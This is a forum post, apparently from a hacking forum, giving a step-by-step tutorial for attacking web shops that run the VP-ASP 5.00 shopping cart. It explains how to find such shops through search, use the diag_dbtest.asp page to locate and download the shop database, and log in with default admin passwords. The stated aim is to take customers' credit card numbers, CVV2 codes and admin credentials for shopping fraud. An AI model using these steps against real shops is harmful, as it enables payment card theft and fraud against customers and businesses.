Jump to content
sandabot

Hacking VP-ASP 5.00 - Tutorial

Recommended Posts

Posted (edited)

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart

Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00

2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp

The exploit is: diag_dbtest.asp

Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:

xDatabase

shopping140

xDblocation

resx

xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r

Example:

The most important thing here is xDatabase

xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:

xDblocation

resx

the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :

****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.

Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:

Username: admin

password: admin

OR

Username: vpasp

password: vpasp

//mai pe simplu puteti sa va facei bogati daca gasiti un shop bun :)

Edited by sandabot

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...